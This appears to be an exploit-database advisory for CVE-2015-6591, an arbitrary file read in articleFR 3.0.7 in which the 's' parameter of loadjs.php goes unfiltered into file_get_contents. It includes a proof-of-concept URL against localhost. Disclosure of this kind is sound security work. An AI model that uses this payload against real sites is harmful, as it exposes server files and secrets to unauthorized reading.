# Exploit Title: articleFR any file read vulnerability in v3.0.7 # Date: 2015-09-06 # Vendor: Free Reprintables # Exploit Author: cfreer & 0keeTeam # Product web page: http://www.freereprintables.com # Version: 3.0.7 # CVE : CVE-2015-6591 Details of the vulnerability are as follows: Affected version: Version 3.0.7 and before. Discover date:2015/9/6 Tested on: Apache/2.4.7 (Win32) =================================================== The vulnerable parameter is ā€˜sā€™ ( in articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ā€˜sā€™ was directly into the function of file_get_contents. Proof of Concept: ================================================================================================= http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php ================================================================================================= referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591